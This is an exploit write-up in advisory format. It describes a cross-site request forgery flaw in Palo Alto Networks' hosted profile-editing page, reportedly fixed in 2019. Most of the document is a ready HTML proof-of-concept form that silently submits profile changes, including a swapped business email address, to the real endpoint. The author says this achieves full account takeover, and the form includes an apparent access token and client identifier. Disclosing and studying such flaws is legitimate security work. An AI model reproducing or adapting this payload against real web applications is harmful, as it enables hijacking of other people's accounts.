** Note : this vulnerability is already fixed by paloalto security team

# Exploit Title: Missing CSRF Token Leads to account full takeover (All
accounts can be hijacked)
# Google Dork: [N/A]
# Date: [JUl 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage:https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE : [N/A]
# Acknowledgement:
https://www.paloaltonetworks.com/security-researcher-acknowledgement

summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they're currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request.

Steps to generate
----------------------
>> Initially account should be authenticated

>> for testing purpose i changed email address ..and account was fully
takeover

if html files not works then follow this steps

>> go to profile setting

>> change your profile details

>> then intercept that request

>> then generate csrf poc and then try in browser..boom! account
cresdentials will be changed .


PoC
---

<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="
https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp"
method="POST">
      <input type="hidden" name="utf8" value="â&#156;&#147;" />
      <input type="hidden" name="access&#95;token" value="m5xw97v7uy63yqw7"
/>
      <input type="hidden" name="capture&#95;screen" value="editProfile" />
      <input type="hidden" name="js&#95;version" value="d445bf4" />
      <input type="hidden" name="capture&#95;transactionId"
value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
      <input type="hidden" name="form" value="editProfileForm" />
      <input type="hidden" name="flow" value="customstandardflow" />
      <input type="hidden" name="client&#95;id"
value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
      <input type="hidden" name="redirect&#95;uri"
value="http&#58;&#47;&#47;localhost&#47;" />
      <input type="hidden" name="response&#95;type" value="token" />
      <input type="hidden" name="flow&#95;version"
value="20190502085125375950" />
      <input type="hidden" name="settings&#95;version" value="" />
      <input type="hidden" name="locale" value="en&#45;US" />
      <input type="hidden" name="recaptchaVersion" value="2" />
      <input type="hidden" name="Salutation" value="" />
      <input type="hidden" name="First&#95;Name&#95;&#95;c"
value="EMAIL_HIJACKED" />
      <input type="hidden" name="Middle&#95;Name&#95;&#95;c" value="" />
      <input type="hidden" name="Last&#95;Name&#95;&#95;c" value="test" />
      <input type="hidden" name="suffix" value="" />
      <input type="hidden" name="Email&#95;Display&#95;Name"
value="hpankajjj" />
      <input type="hidden" name="Business&#95;Email"
value="pankajTESTHIJACKED&#64;yopmail&#46;com" />
      <input type="hidden" name="Personal&#95;Email" value="" />
      <input type="hidden" name="Business&#95;Phone" value="9999999999" />
      <input type="hidden" name="MobilePhone" value="" />
      <input type="hidden" name="Company" value="AbeBooks" />
      <input type="hidden" name="Title" value="" />
      <input type="hidden" name="Job&#95;Role&#95;&#95;c"
value="Administrator" />
      <input type="hidden" name="Job&#95;Level&#95;&#95;c" value="" />
      <input type="hidden" name="Address1" value="" />
      <input type="hidden" name="Address2" value="" />
      <input type="hidden" name="City" value="" />
      <input type="hidden" name="Zip&#95;or&#95;Postal&#95;Code" value="" />
      <input type="hidden" name="Country" value="India" />
      <input type="hidden" name="Alt&#95;State&#95;Province&#95;&#95;c"
value="" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="Preferred&#95;Communication" value="" />
      <input type="hidden" name="language&#95;&#95;c" value="en&#95;US" />
      <input type="hidden" name="location&#95;&#95;c" value="India" />
      <input type="hidden" name="BreachPrevention&#95;hidden" value="" />
      <input type="hidden" name="BYOD&#95;hidden" value="" />
      <input type="hidden" name="CloudSecurity&#95;hidden" value="" />
      <input type="hidden" name="Cybersecurity&#95;hidden" value="" />
      <input type="hidden" name="DataCenterVirtualization&#95;hidden"
value="" />
      <input type="hidden" name="EndpointSecurity&#95;hidden" value="" />
      <input type="hidden" name="Firewalls&#95;hidden" value="" />
      <input type="hidden" name="Mobility&#95;hidden" value="" />
      <input type="hidden" name="NetworkSecurity&#95;hidden" value="" />
      <input type="hidden" name="NetworkPerimeter&#95;hidden" value="" />
      <input type="hidden" name="NextGenerationFirewall&#95;hidden"
value="" />
      <input type="hidden" name="SaaSSecurity&#95;hidden" value="" />
      <input type="hidden" name="ThreatPrevention&#95;hidden" value="" />
      <input type="hidden"
name="subscribeToNewsAndProductUpdates&#95;hidden" value="" />
      <input type="hidden" name="subscribeToEventsAndWebinars&#95;hidden"
value="" />
      <input type="hidden"
name="subscribeToUnit42ThreatResearch&#95;hidden" value="" />
      <input type="hidden" name="tab1complete&#95;&#95;c" value="true" />
      <input type="hidden" name="tab2complete&#95;&#95;c" value="false" />
      <input type="hidden" name="tab3complete&#95;&#95;c" value="false" />
      <input type="hidden" name="tab4complete&#95;&#95;c" value="false" />
      <input type="hidden" name="tab5complete&#95;&#95;c" value="false" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


THANK YOU

PANKAJ KUMAR THAKUR

INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK
Inc | OSCP